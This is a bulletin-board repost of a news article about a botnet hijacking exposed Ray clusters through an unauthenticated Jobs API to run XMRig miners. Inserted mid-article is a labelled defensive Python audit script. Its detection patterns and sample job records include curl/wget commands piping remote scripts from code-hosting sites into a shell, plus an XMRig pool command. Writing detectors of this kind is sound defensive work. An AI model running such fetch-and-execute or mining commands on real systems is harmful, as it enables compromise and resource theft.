Subj : Ray clusters hijacked and
To : All
From : Mike Powell
Date : Thu Nov 20 2025 08:26 am
Ray clusters hijacked and turned into crypto miners by shadowy new botnet
Date:
Wed, 19 Nov 2025 15:21:00 +0000
Description:
IronErn440 is using a known, unfixed flaw to create a botnet and deploy the
XMRig cryptojacker.
FULL STORY
Ray clusters, still vulnerable to a critical-severity flaw discovered years
ago, are being used for cryptocurrency mining, data exfiltration, and even
Distributed Denial of Service (DDoS) attacks, experts have warned.
Cybersecurity researchers at Oligo say this is the second major campaign to
leverage this same flaw.
Ray is an open source framework that helps run Python programs faster by
distributing the work across multiple machines. Its clusters are groups of
computers - one head node and multiple worker nodes - that work together to
run Ray tasks and workloads in a distributed and coordinated way.
Back in 2023, it was discovered that Ray 2.6.3 and 2.8.0 carried a
vulnerability that allowed a remote attacker to execute arbitrary code via
the job submission API. However, Anyscale, the company behind the project,
did not fix it, since Ray is designed to run in a strictly controlled network
environment.
In other words, it's up to users to secure their infrastructure and make
sure the flaw does not get abused.
But abused it was: first between September 2023 and March 2024, and again
today. Oligo says that threat actors tracked as IronErn440 are now using
AI-generated payloads to infiltrate vulnerable clusters. By leveraging the
bug, the attackers submit jobs to the unauthenticated Jobs API, running
multi-stage Bash and Python payloads hosted on GitHub and GitLab.
These payloads deploy malware to the devices - usually the infamous XMRig
cryptojacker. While this cryptojacker is usually easy to spot (since it
takes up 100% of the device's processing power and renders it useless for
pretty much anything else), the attackers tried to work around this by
capping it at 60% of processing power.
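As an added, defender-side example (not from the article, Oligo, or the Ray project): a small Python audit that reviews job records of the kind a cluster's Jobs API lists and flags entrypoints matching the pattern described above (remote Bash/Python stages fetched from code-hosting sites, or a miner binary). The sample records are constructed, and the field names submission_id and entrypoint are assumed to follow Ray's job-listing response.

```python
import json
import re

# Heuristics for the submission pattern described in the article: a shell
# one-liner that fetches a remote script and pipes it into an interpreter,
# a payload staged on GitHub/GitLab, or a command that names a miner.
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b", re.I)
CODE_HOST = re.compile(
    r"https?://(raw\.githubusercontent\.com|gist\.github(usercontent)?\.com|gitlab\.com)/",
    re.I,
)
MINER_HINT = re.compile(r"xmrig|stratum\+tcp", re.I)


def review_entrypoint(entrypoint: str) -> list:
    """Return the list of indicators found in one job entrypoint."""
    hits = []
    if REMOTE_FETCH.search(entrypoint):
        hits.append("remote-script-piped-to-shell")
    if CODE_HOST.search(entrypoint):
        hits.append("payload-hosted-on-code-host")
    if MINER_HINT.search(entrypoint):
        hits.append("miner-indicator")
    return hits


def flag_jobs(jobs_json: str) -> dict:
    """Map submission_id -> indicators for every job that has any."""
    flagged = {}
    for job in json.loads(jobs_json):
        hits = review_entrypoint(job.get("entrypoint", ""))
        if hits:
            flagged[job["submission_id"]] = hits
    return flagged


# Constructed sample (hosts and paths are placeholders): one legitimate
# training job alongside three that match the campaign's pattern.
SAMPLE_JOBS = json.dumps([
    {"submission_id": "raysubmit_train01", "entrypoint": "python train.py --epochs 10"},
    {"submission_id": "raysubmit_x1", "entrypoint": "curl -s https://raw.githubusercontent.com/example/repo/main/s.sh | bash"},
    {"submission_id": "raysubmit_x2", "entrypoint": "bash -c 'wget -qO- https://gitlab.com/example/p/-/raw/main/run.sh | sh'"},
    {"submission_id": "raysubmit_x3", "entrypoint": "./xmrig -o stratum+tcp://pool.example:3333"},
])

if __name__ == "__main__":
    for sid, hits in flag_jobs(SAMPLE_JOBS).items():
        print(sid, hits)
```

Run it against the output of a cluster's job listing; any flagged submission on a cluster that should only see known training workloads is worth triage, and the more durable fix is to keep the dashboard and Jobs API off the internet entirely.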
Today, there are more than 230,000 Ray servers exposed to the internet, the
researchers warned, up significantly from just a few thousand when the
vulnerability was first discovered.
Via BleepingComputer
======================================================================
Link to news story:
https://www.techradar.com/pro/security/ray-clusters-hijacked-and-turned-into-crypto-miners-by-shadowy-new-botnet
$$
--- SBBSecho 3.28-Linux
* Origin: capitolcityonline.net * Telnet/SSH:2022/HTTP (1:2320/105)